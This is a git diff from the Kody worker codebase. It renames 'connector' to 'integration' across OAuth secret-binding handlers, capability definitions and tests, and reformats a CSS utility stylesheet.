-			if (currentParams.connector && secretWasNewlyCreated) {
+			if (currentParams.integration && secretWasNewlyCreated) {
 				try {
 					await rollbackSecretValue(currentParams, session)
 				} catch (rollbackError) {
@@ -494,22 +494,22 @@ export function ConnectSecretRoute(handle: Handle) {
 					const originalMessage =
 						error instanceof Error
 							? error.message
-							: 'Unable to update connector config.'
+							: 'Unable to update integration config.'
 					setState({
 						step: 'error',
-						error: `Connector configuration failed and rollback did not complete. ${originalMessage} ${rollbackMessage}`,
+						error: `Integration configuration failed and rollback did not complete. ${originalMessage} ${rollbackMessage}`,
 					})
 					return
 				}
 			}
 			setState({
 				step: 'error',
-				error: formatConnectorConfigFailureMessage(error, {
+				error: formatIntegrationConfigFailureMessage(error, {
 					secretRolledBack: Boolean(
-						currentParams.connector && secretWasNewlyCreated,
+						currentParams.integration && secretWasNewlyCreated,
 					),
 					updatedSecretRetained: Boolean(
-						currentParams.connector && !secretWasNewlyCreated,
+						currentParams.integration && !secretWasNewlyCreated,
 					),
 				}),
 			})

--- a/packages/worker/public/mcp-apps/kody-ui-utils.css
+++ b/packages/worker/public/mcp-apps/kody-ui-utils.css
@@ -1,172 +1,176 @@
 /* packages/worker/client/mcp-apps/kody-ui-utils.css */
 :root {
-	color-scheme: light dark;
-	--font-body: ui-sans-serif, system-ui, sans-serif;
-	--font-mono: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, monospace;
-	--spacing-1: 0.25rem;
-	--spacing-2: 0.5rem;
-	--spacing-3: 0.75rem;
-	--spacing-4: 1rem;
-	--spacing-6: 1.5rem;
-	--radius-2: 0.5rem;
-	--radius-3: 0.75rem;
-	--shadow-1: 0 1px 2px rgb(15 23 42 / 0.08);
-	--color-bg: #ffffff;
-	--color-surface: #f8fafc;
-	--color-fg: #0f172a;
-	--color-muted: #475569;
-	--color-border: #dbe2ea;
-	--color-accent: #2563eb;
-	--color-accent-contrast: #ffffff;
-	--color-code-bg: rgb(15 23 42 / 0.06);
+  color-scheme: light dark;
+  --font-body:
+    ui-sans-serif,
+    system-ui,
+    sans-serif;
+  --font-mono:
+    ui-monospace,
+    SFMono-Regular,
+    Menlo,
+    Monaco,
+    Consolas,
+    monospace;
+  --spacing-1: 0.25rem;
+  --spacing-2: 0.5rem;
+  --spacing-3: 0.75rem;
+  --spacing-4: 1rem;
+  --spacing-6: 1.5rem;
+  --radius-2: 0.5rem;
+  --radius-3: 0.75rem;
+  --shadow-1: 0 1px 2px rgb(15 23 42 / 0.08);
+  --color-bg: #ffffff;
+  --color-surface: #f8fafc;
+  --color-fg: #0f172a;
+  --color-muted: #475569;
+  --color-border: #dbe2ea;
+  --color-accent: #2563eb;
+  --color-accent-contrast: #ffffff;
+  --color-code-bg: rgb(15 23 42 / 0.06);
 }
 @media (prefers-color-scheme: dark) {
-	:root {
-		--color-bg: #0f172a;
-		--color-surface: #162033;
-		--color-fg: #e5eef8;
-		--color-muted: #a5b4c7;
-		--color-border: #2a3950;
-		--color-accent: #60a5fa;
-		--color-accent-contrast: #0f172a;
-		--color-code-bg: rgb(148 163 184 / 0.16);
-	}
+  :root {
+    --color-bg: #0f172a;
+    --color-surface: #162033;
+    --color-fg: #e5eef8;
+    --color-muted: #a5b4c7;
+    --color-border: #2a3950;
+    --color-accent: #60a5fa;
+    --color-accent-contrast: #0f172a;
+    --color-code-bg: rgb(148 163 184 / 0.16);
+  }
 }
 :where(html) {
-	min-height: 100%;
-	background: var(--color-bg);
-	color: var(--color-fg);
+  min-height: 100%;
+  background: var(--color-bg);
+  color: var(--color-fg);
 }
 :where(body) {
-	min-height: 100%;
-	margin: 0;
-	padding: var(--spacing-4);
-	background: var(--color-bg);
-	color: var(--color-fg);
-	font: 400 14px/1.5 var(--font-body);
+  min-height: 100%;
+  margin: 0;
+  padding: var(--spacing-4);
+  background: var(--color-bg);
+  color: var(--color-fg);
+  font: 400 14px/1.5 var(--font-body);
 }
-:where(body[data-kody-runtime='javascript']) {
-	padding: 0;
+:where(body[data-kody-runtime=javascript]) {
+  padding: 0;
 }
 :where(*, *::before, *::after) {
-	box-sizing: border-box;
+  box-sizing: border-box;
 }
 :where(a) {
-	color: var(--color-accent);
+  color: var(--color-accent);
 }
 :where(p, ul, ol, dl, pre, table, blockquote, fieldset) {
-	margin: 0 0 var(--spacing-4);
+  margin: 0 0 var(--spacing-4);
 }
 :where(h1, h2, h3, h4, h5, h6) {
-	margin: 0 0 var(--spacing-3);
-	line-height: 1.2;
+  margin: 0 0 var(--spacing-3);
+  line-height: 1.2;
 }
 :where(h1) {
-	font-size: 1.875rem;
+  font-size: 1.875rem;
 }
 :where(h2) {
-	font-size: 1.5rem;
+  font-size: 1.5rem;
 }
 :where(h3) {
-	font-size: 1.25rem;
+  font-size: 1.25rem;
 }
 :where(ul, ol) {
-	padding-left: 1.5rem;
+  padding-left: 1.5rem;
 }
 :where(hr) {
-	border: 0;
-	border-top: 1px solid var(--color-border);
-	margin: var(--spacing-6) 0;
+  border: 0;
+  border-top: 1px solid var(--color-border);
+  margin: var(--spacing-6) 0;
 }
 :where(code, kbd, samp) {
-	font-family: var(--font-mono);
-	font-size: 0.95em;
+  font-family: var(--font-mono);
+  font-size: 0.95em;
 }
 :where(code) {
-	background: var(--color-code-bg);
-	border-radius: 0.375rem;
-	padding: 0.1rem 0.35rem;
+  background: var(--color-code-bg);
+  border-radius: 0.375rem;
+  padding: 0.1rem 0.35rem;
 }
 :where(pre) {
-	overflow-x: auto;
-	padding: var(--spacing-3);
-	background: var(--color-code-bg);
-	border: 1px solid var(--color-border);
-	border-radius: var(--radius-2);
+  overflow-x: auto;
+  padding: var(--spacing-3);
+  background: var(--color-code-bg);
+  border: 1px solid var(--color-border);
+  border-radius: var(--radius-2);
 }
 :where(pre code) {
-	background: transparent;
-	padding: 0;
+  background: transparent;
+  padding: 0;
 }
 :where(form) {
-	display: grid;
-	gap: var(--spacing-4);
+  display: grid;
+  gap: var(--spacing-4);
 }
 :where(label) {
-	display: grid;
-	gap: var(--spacing-2);
-	font-weight: 600;
+  display: grid;
+  gap: var(--spacing-2);
+  font-weight: 600;
 }
 :where(input, button, textarea, select) {
-	font: inherit;
+  font: inherit;
 }
-:where(input:not([type='checkbox']):not([type='radio']), textarea, select) {
-	width: 100%;
-	padding: var(--spacing-2) var(--spacing-3);
-	background: var(--color-surface);
-	color: var(--color-fg);
-	border: 1px solid var(--color-border);
-	border-radius: var(--radius-2);
-	box-shadow: inset 0 1px 2px rgb(15 23 42 / 0.04);
+:where(input:not([type=checkbox]):not([type=radio]), textarea, select) {
+  width: 100%;
+  padding: var(--spacing-2) var(--spacing-3);
+  background: var(--color-surface);
+  color: var(--color-fg);
+  border: 1px solid var(--color-border);
+  border-radius: var(--radius-2);
+  box-shadow: inset 0 1px 2px rgb(15 23 42 / 0.04);
 }
 :where(textarea) {
-	min-height: 7rem;
-	resize: vertical;
+  min-height: 7rem;
+  resize: vertical;
 }
-:where(input[type='checkbox'], input[type='radio']) {
-	accent-color: var(--color-accent);
+:where(input[type=checkbox], input[type=radio]) {
+  accent-color: var(--color-accent);
 }
 :where(button) {
-	width: fit-content;
-	padding: var(--spacing-2) var(--spacing-4);
-	background: var(--color-accent);
-	color: var(--color-accent-contrast);
-	border: 1px solid transparent;
-	border-radius: var(--radius-2);
-	box-shadow: var(--shadow-1);
-	cursor: pointer;
+  width: fit-content;
+  padding: var(--spacing-2) var(--spacing-4);
+  background: var(--color-accent);
+  color: var(--color-accent-contrast);
+  border: 1px solid transparent;
+  border-radius: var(--radius-2);
+  box-shadow: var(--shadow-1);
+  cursor: pointer;
 }
 :where(button:disabled, input:disabled, textarea:disabled, select:disabled) {
-	opacity: 0.7;
-	cursor: not-allowed;
+  opacity: 0.7;
+  cursor: not-allowed;
 }
-:where(
-	button:focus-visible,
-	input:focus-visible,
-	textarea:focus-visible,
-	select:focus-visible
-) {
-	outline: 2px solid var(--color-accent);
-	outline-offset: 2px;
+:where(button:focus-visible, input:focus-visible, textarea:focus-visible, select:focus-visible) {
+  outline: 2px solid var(--color-accent);
+  outline-offset: 2px;
 }
 :where(table) {
-	width: 100%;
-	border-collapse: collapse;
+  width: 100%;
+  border-collapse: collapse;
 }
 :where(th, td) {
-	padding: var(--spacing-2) var(--spacing-3);
-	border: 1px solid var(--color-border);
-	text-align: left;
+  padding: var(--spacing-2) var(--spacing-3);
+  border: 1px solid var(--color-border);
+  text-align: left;
 }
 :where(th) {
-	background: var(--color-surface);
+  background: var(--color-surface);
 }
 :where(blockquote) {
-	margin-left: 0;
-	padding-left: var(--spacing-4);
-	border-left: 3px solid var(--color-border);
-	color: var(--color-muted);
+  margin-left: 0;
+  padding-left: var(--spacing-4);
+  border-left: 3px solid var(--color-border);
+  color: var(--color-muted);
 }
 :where([data-generated-ui-root]) {
-	min-height: 100%;
+  min-height: 100%;
 }

--- a/packages/worker/public/mcp-apps/kody-ui-utils.css
+++ b/packages/worker/public/mcp-apps/kody-ui-utils.css
@@ -7,10 +7,10 @@
     sans-serif;
   --font-mono:
     ui-monospace,
-    SFMono-Regular,
-    Menlo,
-    Monaco,
-    Consolas,
+    "SFMono-Regular",
+    "Menlo",
+    "Monaco",
+    "Consolas",
     monospace;
   --spacing-1: 0.25rem;
   --spacing-2: 0.5rem;

--- a/packages/worker/src/agent-turn/tools.ts
+++ b/packages/worker/src/agent-turn/tools.ts
@@ -53,7 +53,7 @@ export async function createAgentTurnToolSet(input: {
 	return {
 		search: tool({
 			description:
-				'Search Kody capabilities, saved packages, values, connectors, and secret references using a natural language query.',
+				'Search Kody capabilities, saved packages, values, integrations, and secret references using a natural language query.',
 			inputSchema: z.object({
 				query: z.string().min(1),
 				limit: z.number().int().min(1).max(50).optional(),

--- a/packages/worker/src/app/handlers/account-secrets.node.test.ts
+++ b/packages/worker/src/app/handlers/account-secrets.node.test.ts
@@ -175,7 +175,7 @@ test('connect oauth returns direct host approval links for saved token secrets',
 					'https://example.com/account/secrets/user/githubRefreshToken?allowed-host=github.com',
 			},
 		],
-		connectorName: 'GitHub',
+		integrationName: 'GitHub',
 	})
 	expect(mockModule.buildSecretHostApprovalUrl).toHaveBeenCalledTimes(4)
 	expect(mockModule.setSecretAllowedHosts).not.toHaveBeenCalled()
@@ -249,7 +249,7 @@ test('connect oauth omits direct host approval links when hosts are already appr
 		accessTokenSaved: true,
 		refreshTokenSaved: true,
 		hostApprovalLinks: [],
-		connectorName: 'Tesla',
+		integrationName: 'Tesla',
 	})
 	expect(payload.allowedHosts).toEqual(
 		expect.arrayContaining([

--- a/packages/worker/src/app/handlers/account-secrets.ts
+++ b/packages/worker/src/app/handlers/account-secrets.ts
@@ -29,9 +29,9 @@ import { normalizeAllowedPackages } from '#mcp/secrets/allowed-packages.ts'
 import { normalizeAllowedHosts } from '#mcp/secrets/allowed-hosts.ts'
 import { getValue, saveValue } from '#mcp/values/service.ts'
 import {
-	buildConnectorValueName,
-	normalizeConnectorConfig,
-} from '#mcp/capabilities/values/connector-shared.ts'
+	buildIntegrationValueName,
+	normalizeIntegrationConfig,
+} from '#mcp/capabilities/values/integration-shared.ts'
 
 type AccountEditableSecretScope = Extract<SecretScope, 'app' | 'user'>
 
@@ -362,7 +362,7 @@ async function handleConnectOauthAction(input: {
 		refreshSaved = true
 	}
 
-	const connectorName = await saveConnectorConfig({
+	const integrationName = await saveIntegrationConfig({
 		env: input.env,
 		userId: input.user.mcpUser.userId,
 		provider,
@@ -404,7 +404,7 @@ async function handleConnectOauthAction(input: {
 		refreshTokenSaved: refreshSaved,
 		allowedHosts,
 		hostApprovalLinks,
-		connectorName,
+		integrationName,
 	})
 }
 
@@ -551,7 +551,7 @@ async function handleOAuthExchangeAction(input: {
 	return jsonResponse(payload as Record<string, unknown>, response.status)
 }
 
-async function saveConnectorConfig(input: {
+async function saveIntegrationConfig(input: {
 	env: Env
 	userId: string
 	provider: string
@@ -569,7 +569,7 @@ async function saveConnectorConfig(input: {
 	if (!providerKey) {
 		throw new Error('Provider must contain letters or numbers.')
 	}
-	const connector = normalizeConnectorConfig({
+	const integration = normalizeIntegrationConfig({
 		name: input.provider,
 		tokenUrl: input.tokenUrl,
 		apiBaseUrl: input.apiBaseUrl,
@@ -588,13 +588,13 @@ async function saveConnectorConfig(input: {
 	await saveValue({
 		env: input.env,
 		userId: input.userId,
-		name: buildConnectorValueName(connector.name),
-		value: JSON.stringify(connector),
+		name: buildIntegrationValueName(integration.name),
+		value: JSON.stringify(integration),
 		scope: 'user',
-		description: `OAuth connector config for ${connector.name}`,
+		description: `OAuth integration config for ${integration.name}`,
 		storageContext: { sessionId: null, appId: null },
 	})
-	return connector.name
+	return integration.name
 }
 
 function readTokenField(

--- a/packages/worker/src/app/handlers/connect-secret.node.test.ts
+++ b/packages/worker/src/app/handlers/connect-secret.node.test.ts
@@ -216,7 +216,7 @@ test('connect secret POST rejects app scope when session is not app-scoped', asy
 				name: 'linearApiKey',
 				scope: 'app',
 				sessionToken: 'generated-token',
-				connector: 'linear',
+				integration: 'linear',
 				allowedCapabilities: ['linear_issue_list'],
 			}),
 		}),
@@ -230,7 +230,7 @@ test('connect secret POST rejects app scope when session is not app-scoped', asy
 	})
 })
 
-test('connect secret POST stores connector binding under dedicated prefix', async () => {
+test('connect secret POST stores integration binding under dedicated prefix', async () => {
 	mockModule.resolveSecret.mockResolvedValueOnce({
 		found: true,
 		allowedHosts: ['api.linear.app'],
@@ -247,7 +247,7 @@ test('connect secret POST stores connector binding under dedicated prefix', asyn
 				name: 'linearApiKey',
 				scope: 'user',
 				sessionToken: 'generated-token',
-				connector: 'linear',
+				integration: 'linear',
 			}),
 		}),
 		params: {},
@@ -257,26 +257,26 @@ test('connect secret POST stores connector binding under dedicated prefix', asyn
 	await expect(readJson(response)).resolves.toEqual({ ok: true })
 	expect(mockModule.saveValue).toHaveBeenCalledWith(
 		expect.objectContaining({
-			name: '_connector-secret:linear',
+			name: '_integration-secret:linear',
 			value: JSON.stringify({
 				secretName: 'linearApiKey',
 				allowedHosts: ['api.linear.app'],
 				allowedCapabilities: ['linear_issue_list'],
 				allowedPackages: ['package-123'],
 			}),
-			description: 'Connector secret binding for linear',
+			description: 'Integration secret binding for linear',
 			scope: 'user',
 			storageContext: { sessionId: 'session-1', appId: null },
 		}),
 	)
 	expect(mockModule.saveValue).not.toHaveBeenCalledWith(
 		expect.objectContaining({
-			name: '_connector:linear',
+			name: '_integration:linear',
 		}),
 	)
 })
 
-test('connect secret POST clears connector binding packages when explicitly empty', async () => {
+test('connect secret POST clears integration binding packages when explicitly empty', async () => {
 	mockModule.resolveSecret.mockResolvedValueOnce({
 		found: true,
 		allowedHosts: ['api.linear.app'],
@@ -293,7 +293,7 @@ test('connect secret POST clears connector binding packages when explicitly empt
 				name: 'linearApiKey',
 				scope: 'user',
 				sessionToken: 'generated-token',
-				connector: 'linear',
+				integration: 'linear',
 				allowedPackages: [],
 			}),
 		}),
@@ -304,7 +304,7 @@ test('connect secret POST clears connector binding packages when explicitly empt
 	await expect(readJson(response)).resolves.toEqual({ ok: true })
 	expect(mockModule.saveValue).toHaveBeenCalledWith(
 		expect.objectContaining({
-			name: '_connector-secret:linear',
+			name: '_integration-secret:linear',
 			value: JSON.stringify({
 				secretName: 'linearApiKey',
 				allowedHosts: ['api.linear.app'],

--- a/packages/worker/src/app/handlers/connect-secret.ts
+++ b/packages/worker/src/app/handlers/connect-secret.ts
@@ -25,7 +25,7 @@ import {
 import { secretScopeValues, type SecretScope } from '#mcp/secrets/types.ts'
 import { saveValue } from '#mcp/values/service.ts'
 
-const connectSecretConnectorBindingPrefix = '_connector-secret:'
+const connectSecretIntegrationBindingPrefix = '_integration-secret:'
 
 export function createConnectSecretHandler(_env: Env) {
 	return {
@@ -120,7 +120,7 @@ export function createConnectSecretApiHandler(env: Env) {
 			const sessionToken = readString(body, 'sessionToken')
 			const value = readOptionalString(body, 'value')
 			const description = readOptionalString(body, 'description') ?? ''
-			const connector = readOptionalString(body, 'connector')
+			const integration = readOptionalString(body, 'integration')
 			const requestedAllowedHosts =
 				readOptionalStringArray(body, 'allowedHosts') ?? []
 			const requestedAllowedCapabilities =
@@ -245,7 +245,7 @@ export function createConnectSecretApiHandler(env: Env) {
 						storageContext,
 					})
 				}
-				if (connector) {
+				if (integration) {
 					const resolved = await resolveSecret({
 						env,
 						userId: user.mcpUser.userId,
@@ -271,14 +271,14 @@ export function createConnectSecretApiHandler(env: Env) {
 					await saveValue({
 						env,
 						userId: user.mcpUser.userId,
-						name: buildConnectSecretConnectorBindingValueName(connector),
+						name: buildConnectSecretIntegrationBindingValueName(integration),
 						value: JSON.stringify({
 							secretName: name,
 							allowedHosts,
 							allowedCapabilities,
 							allowedPackages,
 						}),
-						description: `Connector secret binding for ${connector}`,
+						description: `Integration secret binding for ${integration}`,
 						scope,
 						storageContext,
 					})
@@ -291,7 +291,7 @@ export function createConnectSecretApiHandler(env: Env) {
 						error:
 							error instanceof Error
 								? error.message
-								: 'Unable to update connector configuration.',
+								: 'Unable to update integration configuration.',
 					},
 					400,
 				)
@@ -354,8 +354,8 @@ function readScope(body: object): SecretScope | null {
 		: null
 }
 
-function buildConnectSecretConnectorBindingValueName(connector: string) {
-	return `${connectSecretConnectorBindingPrefix}${connector}`
+function buildConnectSecretIntegrationBindingValueName(integration: string) {
+	return `${connectSecretIntegrationBindingPrefix}${integration}`
 }
 
 function jsonResponse(body: Record<string, unknown>, status = 200) {

--- a/packages/worker/src/mcp/capabilities/coding/kody-official-guide.ts
+++ b/packages/worker/src/mcp/capabilities/coding/kody-official-guide.ts
@@ -20,7 +20,7 @@ export const kodyOfficialGuideCatalog = {
 		file: 'integration-bootstrap.md',
 		title: 'Integration bootstrap guide',
 		summary:
-			'START HERE when a third-party integration must work before saving a dependent package or package app: inspect connector/secret state, stop for setup, then run an authenticated smoke test.',
+			'START HERE when a third-party integration must work before saving a dependent package or package app: inspect integration/secret state, stop for setup, then run an authenticated smoke test.',
 	},
 	secret_backed_integration: {
 		file: 'secret-backed-integration.md',
@@ -32,7 +32,7 @@ export const kodyOfficialGuideCatalog = {
 		file: 'integration-backed-app-happy-path.md',
 		title: 'Integration-backed package app happy path',
 		summary:
-			'After connector/secret verification and a cheap smoke test, proceed directly to a package app rooted in package.json and package-owned code; avoid unnecessary repo spelunking.',
+			'After integration/secret verification and a cheap smoke test, proceed directly to a package app rooted in package.json and package-owned code; avoid unnecessary repo spelunking.',
 	},
 	oauth: {
 		file: 'oauth.md',
@@ -158,7 +158,7 @@ const allKeywords = [
 		'account id plus token',
 		'integration backed app',
 		'third-party integration',
-		'connector_list',
+		'integration_list',
 		'secret_list',
 		'smoke test',
 		'package app',

--- a/packages/worker/src/mcp/capabilities/values/domain.ts
+++ b/packages/worker/src/mcp/capabilities/values/domain.ts
@@ -1,9 +1,9 @@
 import { defineDomain } from '#mcp/capabilities/define-domain.ts'
 import { capabilityDomainNames } from '#mcp/capabilities/domain-metadata.ts'
-import { connectorDeleteCapability } from './connector-delete.ts'
-import { connectorGetCapability } from './connector-get.ts'
-import { connectorListCapability } from './connector-list.ts'
-import { connectorSaveCapability } from './connector-save.ts'
+import { integrationDeleteCapability } from './integration-delete.ts'
+import { integrationGetCapability } from './integration-get.ts'
+import { integrationListCapability } from './integration-list.ts'
+import { integrationSaveCapability } from './integration-save.ts'
 import { valueDeleteCapability } from './value-delete.ts'
 import { valueGetCapability } from './value-get.ts'
 import { valueListCapability } from './value-list.ts'
@@ -19,9 +19,9 @@ export const valuesDomain = defineDomain({
 		valueGetCapability,
 		valueListCapability,
 		valueDeleteCapability,
-		connectorSaveCapability,
-		connectorGetCapability,
-		connectorListCapability,
-		connectorDeleteCapability,
+		integrationSaveCapability,
+		integrationGetCapability,
+		integrationListCapability,
+		integrationDeleteCapability,
 	],
 })

--- a/packages/worker/src/mcp/capabilities/values/integration-delete.ts
+++ b/packages/worker/src/mcp/capabilities/values/integration-delete.ts
@@ -4,22 +4,22 @@ import { capabilityDomainNames } from '#mcp/capabilities/domain-metadata.ts'
 import { requireMcpUser } from '#mcp/capabilities/meta/require-user.ts'
 import { type CapabilityContext } from '#mcp/capabilities/types.ts'
 import { deleteValue } from '#mcp/values/service.ts'
-import { buildConnectorValueName } from './connector-shared.ts'
+import { buildIntegrationValueName } from './integration-shared.ts'
 
 const inputSchema = z.object({
-	name: z.string().min(1).describe('Connector name to delete.'),
+	name: z.string().min(1).describe('Integration name to delete.'),
 })
 
 const outputSchema = z.object({
 	deleted: z.boolean(),
 })
 
-export const connectorDeleteCapability = defineDomainCapability(
+export const integrationDeleteCapability = defineDomainCapability(
 	capabilityDomainNames.values,
 	{
-		name: 'connector_delete',
-		description: 'Delete a saved OAuth connector configuration by name.',
-		keywords: ['connector', 'oauth', 'config', 'registry', 'delete', 'value'],
+		name: 'integration_delete',
+		description: 'Delete a saved OAuth integration configuration by name.',
+		keywords: ['integration', 'oauth', 'config', 'registry', 'delete', 'value'],
 		readOnly: false,
 		idempotent: false,
 		destructive: true,
@@ -30,7 +30,7 @@ export const connectorDeleteCapability = defineDomainCapability(
 			const deleted = await deleteValue({
 				env: ctx.env,
 				userId: user.userId,
-				name: buildConnectorValueName(args.name),
+				name: buildIntegrationValueName(args.name),
 				scope: 'user',
 				storageContext: {
 					sessionId: ctx.callerContext.storageContext?.sessionId ?? null,

--- a/packages/worker/src/mcp/capabilities/values/integration-get.ts
+++ b/packages/worker/src/mcp/capabilities/values/integration-get.ts
@@ -5,26 +5,26 @@ import { requireMcpUser } from '#mcp/capabilities/meta/require-user.ts'
 import { type CapabilityContext } from '#mcp/capabilities/types.ts'
 import { getValue } from '#mcp/values/service.ts'
 import {
-	buildConnectorValueName,
-	connectorConfigSchema,
-	parseConnectorConfig,
-	parseConnectorJson,
-} from './connector-shared.ts'
+	buildIntegrationValueName,
+	integrationConfigSchema,
+	parseIntegrationConfig,
+	parseIntegrationJson,
+} from './integration-shared.ts'
 
 const inputSchema = z.object({
-	name: z.string().min(1).describe('Connector name to read.'),
+	name: z.string().min(1).describe('Integration name to read.'),
 })
 
 const outputSchema = z.object({
-	connector: connectorConfigSchema.nullable(),
+	integration: integrationConfigSchema.nullable(),
 })
 
-export const connectorGetCapability = defineDomainCapability(
+export const integrationGetCapability = defineDomainCapability(
 	capabilityDomainNames.values,
 	{
-		name: 'connector_get',
-		description: 'Read an OAuth connector configuration by name.',
-		keywords: ['connector', 'oauth', 'config', 'registry', 'read', 'value'],
+		name: 'integration_get',
+		description: 'Read an OAuth integration configuration by name.',
+		keywords: ['integration', 'oauth', 'config', 'registry', 'read', 'value'],
 		readOnly: true,
 		idempotent: true,
 		destructive: false,
@@ -35,7 +35,7 @@ export const connectorGetCapability = defineDomainCapability(
 			const value = await getValue({
 				env: ctx.env,
 				userId: user.userId,
-				name: buildConnectorValueName(args.name),
+				name: buildIntegrationValueName(args.name),
 				scope: 'user',
 				storageContext: {
 					sessionId: ctx.callerContext.storageContext?.sessionId ?? null,
@@ -44,14 +44,14 @@ export const connectorGetCapability = defineDomainCapability(
 				},
 			})
 			if (!value) {
-				return { connector: null }
+				return { integration: null }
 			}
-			const parsed = parseConnectorConfig(
-				parseConnectorJson(value.value),
+			const parsed = parseIntegrationConfig(
+				parseIntegrationJson(value.value),
 				args.name,
 			)
 			return {
-				connector: parsed,
+				integration: parsed,
 			}
 		},
 	},

--- a/packages/worker/src/mcp/capabilities/values/integration-list.ts
+++ b/packages/worker/src/mcp/capabilities/values/integration-list.ts
@@ -5,24 +5,24 @@ import { requireMcpUser } from '#mcp/capabilities/meta/require-user.ts'
 import { type CapabilityContext } from '#mcp/capabilities/types.ts'
 import { listValues } from '#mcp/values/service.ts'
 import {
-	connectorConfigSchema,
-	parseConnectorConfig,
-	parseConnectorValueName,
-	parseConnectorJson,
-} from './connector-shared.ts'
+	integrationConfigSchema,
+	parseIntegrationConfig,
+	parseIntegrationValueName,
+	parseIntegrationJson,
+} from './integration-shared.ts'
 
 const inputSchema = z.object({})
 
 const outputSchema = z.object({
-	connectors: z.array(connectorConfigSchema),
+	integrations: z.array(integrationConfigSchema),
 })
 
-export const connectorListCapability = defineDomainCapability(
+export const integrationListCapability = defineDomainCapability(
 	capabilityDomainNames.values,
 	{
-		name: 'connector_list',
-		description: 'List saved OAuth connector configurations.',
-		keywords: ['connector', 'oauth', 'config', 'registry', 'list', 'value'],
+		name: 'integration_list',
+		description: 'List saved OAuth integration configurations.',
+		keywords: ['integration', 'oauth', 'config', 'registry', 'list', 'value'],
 		readOnly: true,
 		idempotent: true,
 		destructive: false,
@@ -40,19 +40,19 @@ export const connectorListCapability = defineDomainCapability(
 					storageId: ctx.callerContext.storageContext?.storageId ?? null,
 				},
 			})
-			const connectors = values
+			const integrations = values
 				.map((value) => {
-					const connectorName = parseConnectorValueName(value.name)
-					if (!connectorName) return null
-					return parseConnectorConfig(
-						parseConnectorJson(value.value),
-						connectorName,
+					const integrationName = parseIntegrationValueName(value.name)
+					if (!integrationName) return null
+					return parseIntegrationConfig(
+						parseIntegrationJson(value.value),
+						integrationName,
 					)
 				})
-				.filter((entry): entry is z.infer<typeof connectorConfigSchema> =>
+				.filter((entry): entry is z.infer<typeof integrationConfigSchema> =>
 					Boolean(entry),
 				)
-			return { connectors }
+			return { integrations }
 		},
 	},
 )

--- a/packages/worker/src/mcp/capabilities/values/integration-save.node.test.ts
+++ b/packages/worker/src/mcp/capabilities/values/integration-save.node.test.ts
@@ -1,11 +1,11 @@
 import { expect, test } from 'vitest'
 import { createMcpCallerContext } from '#mcp/context.ts'
-import { connectorSaveCapability } from './connector-save.ts'
+import { integrationSaveCapability } from './integration-save.ts'
 import {
-	connectorConfigSchema,
-	mergeConnectorConfig,
-	parseConnectorConfig,
-} from './connector-shared.ts'
+	integrationConfigSchema,
+	mergeIntegrationConfig,
+	parseIntegrationConfig,
+} from './integration-shared.ts'
 
 function createValueTestDb() {
 	const entries = new Map<string, string>()
@@ -43,7 +43,7 @@ function createValueTestDb() {
 									: ({
 											bucket_id: 'bucket-1',
 											name,
-											description: `OAuth connector config for ${name}`,
+											description: `OAuth integration config for ${name}`,
 											value,
 											created_at: '2026-03-29T00:00:00.000Z',
 											updated_at: '2026-03-29T00:00:00.000Z',
@@ -69,8 +69,8 @@ function createValueTestDb() {
 	return { db, entries }
 }
 
-test('mergeConnectorConfig applies patch fields and preserves existing fields', () => {
-	const current = connectorConfigSchema.parse({
+test('mergeIntegrationConfig applies patch fields and preserves existing fields', () => {
+	const current = integrationConfigSchema.parse({
 		name: 'spotify',
 		tokenUrl: 'https://accounts.spotify.com/api/token',
 		apiBaseUrl: 'https://api.spotify.com/v1',
@@ -82,7 +82,7 @@ test('mergeConnectorConfig applies patch fields and preserves existing fields', 
 		requiredHosts: ['accounts.spotify.com', 'api.spotify.com'],
 	})
 
-	const merged = mergeConnectorConfig(current, {
+	const merged = mergeIntegrationConfig(current, {
 		name: 'spotify',
 		apiBaseUrl: 'https://api.spotify.com/v2/',
 		requiredHosts: ['api.spotify.com'],
@@ -95,8 +95,8 @@ test('mergeConnectorConfig applies patch fields and preserves existing fields', 
 	})
 })
 
-test('parseConnectorConfig keeps older rows readable when apiBaseUrl is missing', () => {
-	const parsed = parseConnectorConfig(
+test('parseIntegrationConfig keeps older rows readable when apiBaseUrl is missing', () => {
+	const parsed = parseIntegrationConfig(
 		{
 			name: 'spotify',
 			tokenUrl: 'https://accounts.spotify.com/api/token',
@@ -116,10 +116,10 @@ test('parseConnectorConfig keeps older rows readable when apiBaseUrl is missing'
 	})
 })
 
-test('connector_save upserts an existing connector record', async () => {
+test('integration_save upserts an existing integration record', async () => {
 	const testDb = createValueTestDb()
 	testDb.entries.set(
-		'_connector:spotify',
+		'_integration:spotify',
 		JSON.stringify({
 			name: 'spotify',
 			tokenUrl: 'https://accounts.spotify.com/api/token',
@@ -133,7 +133,7 @@ test('connector_save upserts an existing connector record', async () => {
 		}),
 	)
 
-	const result = await connectorSaveCapability.handler(
+	const result = await integrationSaveCapability.handler(
 		{
 			name: 'spotify',
 			tokenUrl: 'https://accounts.spotify.com/api/token',
@@ -154,13 +154,13 @@ test('connector_save upserts an existing connector record', async () => {
 		},
 	)
 
-	expect(result.connector).toMatchObject({
+	expect(result.integration).toMatchObject({
 		name: 'spotify',
 		apiBaseUrl: 'https://api.spotify.com/v1',
 		requiredHosts: ['api.spotify.com'],
 	})
 	expect(
-		JSON.parse(testDb.entries.get('_connector:spotify') ?? '{}'),
+		JSON.parse(testDb.entries.get('_integration:spotify') ?? '{}'),
 	).toMatchObject({
 		apiBaseUrl: 'https://api.spotify.com/v1',
 		requiredHosts: ['api.spotify.com'],

--- a/packages/worker/src/mcp/capabilities/values/integration-save.node.test.ts
+++ b/packages/worker/src/mcp/capabilities/values/integration-save.node.test.ts
@@ -116,6 +116,78 @@ test('parseIntegrationConfig keeps older rows readable when apiBaseUrl is missin
 	})
 })
 
+test('integration_save creates a new integration record', async () => {
+	const testDb = createValueTestDb()
+
+	const result = await integrationSaveCapability.handler(
+		{
+			name: 'spotify',
+			tokenUrl: 'https://accounts.spotify.com/api/token',
+			apiBaseUrl: 'https://api.spotify.com/v1',
+			flow: 'pkce',
+			clientIdValueName: 'spotify-client-id',
+			clientSecretSecretName: null,
+			accessTokenSecretName: 'spotifyAccessToken',
+			refreshTokenSecretName: 'spotifyRefreshToken',
+			requiredHosts: ['api.spotify.com'],
+		},
+		{
+			env: { APP_DB: testDb.db } as unknown as Env,
+			callerContext: createMcpCallerContext({
+				baseUrl: 'https://heykody.dev',
+				user: { userId: 'user-123' },
+			}),
+		},
+	)
+
+	expect(result.integration).toMatchObject({
+		name: 'spotify',
